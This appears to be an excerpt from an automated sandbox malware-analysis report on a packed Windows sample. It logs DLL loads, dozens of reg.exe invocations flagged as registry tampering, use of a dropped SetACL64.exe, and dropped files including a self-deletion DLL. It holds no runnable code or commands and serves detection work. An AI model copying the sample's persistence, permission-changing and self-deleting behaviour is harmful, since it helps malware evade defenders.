Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: 4hIPvzV6a2.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdbp( source: oofzzwcvgbcojt.exe.0.dr
Source:	Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe, 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.1712894791.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.1714763251.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.1714131650.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.1716174174.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.1715095177.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.1717428003.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.1716547782.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source:	Binary string: D:\Projects\New\win_version_csharp\obj\Release\win_version_csharp.pdb source: win_version_csharp.exe.0.dr
Source:	Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdb source: oofzzwcvgbcojt.exe.0.dr
Source:	Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe, 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.1712894791.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.1714763251.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.1714131650.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.1716174174.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.1715095177.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.1717428003.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.1716547782.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr

Source: win_version_csharp.exe.0.dr

Static PE information: 0xEFE04B64 [Fri Jul 12 07:53:08 2097 UTC]

Source: SetACL64.exe.0.dr

Static PE information: section name: _RDATA

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	File created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\win_version_csharp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	File created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	File created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	File created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	File created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe	Jump to dropped file
